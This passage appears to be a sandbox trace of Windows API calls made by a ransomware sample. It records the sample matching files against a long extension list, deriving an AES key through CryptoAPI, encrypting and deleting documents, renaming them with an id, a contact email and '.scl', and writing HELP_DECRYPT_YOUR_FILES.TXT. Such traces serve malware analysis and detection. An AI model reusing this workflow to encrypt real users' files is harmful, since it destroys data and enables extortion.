dmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0186.857] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0186.857] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0186.857] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0186.862] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xd90d, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0xd90d, lpOverlapped=0x0) returned 1
	[0186.865] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.866] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0186.868] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.868] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0186.868] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.869] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0186.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.869] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0186.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.869] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xd90d, dwBufLen=0xd90d | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xd910) returned 1
	[0186.880] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.881] RtlMoveMemory (in: Destination=0xfeaa98, Source=0xfdd180, Length=0xd90d | out: Destination=0xfeaa98) 
	[0186.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.881] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfeaa98*, pdwDataLen=0x18bc0c*=0xd90d, dwBufLen=0xd910 | out: pbData=0xfeaa98*, pdwDataLen=0x18bc0c*=0xd910) returned 1
	[0186.883] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.884] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0186.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.884] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0186.884] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.884] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0186.884] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.885] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0186.886] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.887] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0186.888] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 93
	[0186.888] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0186.889] WriteFile (in: hFile=0x2c0, lpBuffer=0xfeaa98*, nNumberOfBytesToWrite=0xd910, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfeaa98*, lpNumberOfBytesWritten=0x18c068*=0xd910, lpOverlapped=0x0) returned 1
	[0186.894] CloseHandle (hObject=0x2c0) returned 1
	[0186.894] CloseHandle (hObject=0x384) returned 1
	[0186.895] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx")) returned 1
	[0186.905] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xjlgdz7aaqlp90.docx")) returned 0
	[0186.905] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3cc7350, ftCreationTime.dwHighDateTime=0x1d97311, ftLastAccessTime.dwLowDateTime=0x58e72050, ftLastAccessTime.dwHighDateTime=0x1d9736a, ftLastWriteTime.dwLowDateTime=0x58e72050, ftLastWriteTime.dwHighDateTime=0x1d9736a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XmrBEk9xVyp4RZta6St", cAlternateFileName="XMRBEK~1")) returned 1
	[0186.905] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a14a120, ftCreationTime.dwHighDateTime=0x1d91f4d, ftLastAccessTime.dwLowDateTime=0x883e3c90, ftLastAccessTime.dwHighDateTime=0x1d92ec7, ftLastWriteTime.dwLowDateTime=0x883e3c90, ftLastWriteTime.dwHighDateTime=0x1d92ec7, nFileSizeHigh=0x0, nFileSizeLow=0x17bb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YF-jfD9LCCg7Helac.xlsx", cAlternateFileName="YF-JFD~1.XLS")) returned 1
	[0186.905] lstrcmpW (lpString1="YF-jfD9LCCg7Helac.xlsx", lpString2="..") returned 1
	[0186.906] lstrcmpW (lpString1="YF-jfD9LCCg7Helac.xlsx", lpString2=".") returned 1
	[0186.906] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0186.906] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="YF-jfD9LCCg7Helac.xlsx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\YF-jfD9LCCg7Helac.xlsx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\YF-jfD9LCCg7Helac.xlsx"
	[0186.906] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\YF-jfD9LCCg7Helac.xlsx") returned 54
	[0186.906] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0186.906] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\YF-jfD9LCCg7Helac.xlsx", cchLength=0x36 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx") returned 0x36
	[0186.906] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.907] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx", lpSrch="help_decrypt_your_files") returned 0x0
	[0186.907] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx") returned="c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx"
	[0186.907] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx") returned 54
	[0186.907] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.907] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.908] StrStrW (lpFirst=".xlsx", lpSrch=".") returned=".xlsx"
	[0186.908] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.908] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xlsx") returned=".xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0186.908] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0186.908] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0186.908] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0186.913] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x17bb8, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x17bb8, lpOverlapped=0x0) returned 1
	[0186.920] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.920] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcaef0) returned 1
	[0186.922] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.922] CryptCreateHash (in: hProv=0xfcaef0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0186.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.923] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0186.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.923] CryptDeriveKey (in: hProv=0xfcaef0, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9830) returned 1
	[0186.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.923] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x17bb8, dwBufLen=0x17bb8 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x17bc0) returned 1
	[0186.927] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.927] RtlMoveMemory (in: Destination=0xff4d40, Source=0xfdd180, Length=0x17bb8 | out: Destination=0xff4d40) 
	[0186.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.928] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff4d40*, pdwDataLen=0x18bc0c*=0x17bb8, dwBufLen=0x17bc0 | out: pbData=0xff4d40*, pdwDataLen=0x18bc0c*=0x17bc0) returned 1
	[0186.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.930] CryptDestroyKey (hKey=0xfb9830) returned 1
	[0186.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.931] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0186.931] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.931] CryptReleaseContext (hProv=0xfcaef0, dwFlags=0x0) returned 1
	[0186.931] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.931] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.039] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.040] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0187.041] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 96
	[0187.041] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0187.043] WriteFile (in: hFile=0x2c0, lpBuffer=0xff4d40*, nNumberOfBytesToWrite=0x17bc0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff4d40*, lpNumberOfBytesWritten=0x18c068*=0x17bc0, lpOverlapped=0x0) returned 1
	[0187.051] CloseHandle (hObject=0x2c0) returned 1
	[0187.051] CloseHandle (hObject=0x384) returned 1
	[0187.051] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx")) returned 1
	[0187.062] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\yf-jfd9lccg7helac.xlsx")) returned 0
	[0187.062] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a14a120, ftCreationTime.dwHighDateTime=0x1d91f4d, ftLastAccessTime.dwLowDateTime=0x883e3c90, ftLastAccessTime.dwHighDateTime=0x1d92ec7, ftLastWriteTime.dwLowDateTime=0x883e3c90, ftLastWriteTime.dwHighDateTime=0x1d92ec7, nFileSizeHigh=0x0, nFileSizeLow=0x17bb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YF-jfD9LCCg7Helac.xlsx", cAlternateFileName="YF-JFD~1.XLS")) returned 0
	[0187.062] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0187.063] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0187.063] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned="C:\\Users\\RDhJ0CNFevzX\\Documents"
	[0187.063] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.*"
	[0187.063] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.064] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.064] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT") returned 59
	[0187.064] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
